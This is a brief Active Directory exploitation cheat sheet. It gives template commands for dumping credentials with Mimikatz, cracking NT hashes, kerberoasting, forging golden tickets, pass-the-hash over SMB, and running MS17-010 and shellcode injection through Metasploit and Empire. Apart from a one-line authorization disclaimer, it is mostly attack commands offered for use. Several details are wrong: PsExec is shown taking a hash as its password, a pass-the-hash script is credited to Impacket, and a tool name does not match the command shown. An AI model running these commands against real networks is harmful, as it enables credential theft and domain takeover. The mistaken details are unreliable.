Active Directory Exploitation Cheat Sheet

Active Directory (AD) exploitation involves identifying and exploiting vulnerabilities within an AD environment. In this cheat sheet, we will provide an overview of some of the key techniques and tools that can be used for AD exploitation.

1.Password attacks

Password attacks are one of the most common methods used to gain access to an AD environment. The following tools can be used for password attacks:

• Mimikatz: A tool that can be used to extract passwords and other credentials from memory.

Example command: mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full"

• Hashcat: A password cracking tool that can be used to crack password hashes.

Example command: hashcat -m 1000 -a 0 <password hashes> <wordlist>

• John the Ripper: Another password cracking tool that can be used to crack password hashes.

Example command: john --wordlist=<wordlist> --format=nt <password hashes>

2.Kerberos attacks

Kerberos is the authentication protocol used by AD, and it is a prime target for exploitation. The following tools can be used for Kerberos attacks:

• Kerberoast: A tool that can be used to extract service account password hashes.

Example command: GetUserSPNs.py <domain>/<user>:<password> -request

• Golden Ticket: A technique that can be used to create a forged Kerberos Ticket Granting Ticket (TGT).

Example command: mimikatz.exe "kerberos::golden /user:<user> /domain:<domain> /sid:<SID> /krbtgt:<krbtgt hash> /ticket:<ticket file>"

3.Pass-the-Hash attacks

Pass-the-Hash attacks involve using a password hash to authenticate to an AD environment, without actually knowing the password. The following tools can be used for Pass-the-Hash attacks:

• PsExec: A tool that can be used to execute commands on remote machines.

Example command: PsExec.exe \\target -u <user> -p <NTLM hash> cmd.exe

• Impacket: A collection of Python classes for working with network protocols, including SMB.

Example command: pth-smbclient.py //<target IP>/IPC$ -U "<user>%<NTLM hash>"

4.Remote code execution

Remote code execution involves executing code on a remote machine, which can be used to gain access to an AD environment. The following tools can be used for remote code execution:

• Metasploit: A popular framework for exploit development and delivery, which includes a range of modules for AD exploitation.

Example command: use exploit/windows/smb/ms17_010_psexec (to use the MS17-010 exploit)

• Empire: A post-exploitation framework that can be used to gain and maintain access to a compromised machine.

Example command: usemodule manage/windows/shellcode_inject/multi

These are just a few examples of the tools and techniques that can be used for AD exploitation. It is important to note that AD exploitation can be complex and challenging, and should only be attempted by experienced and authorized pentesters.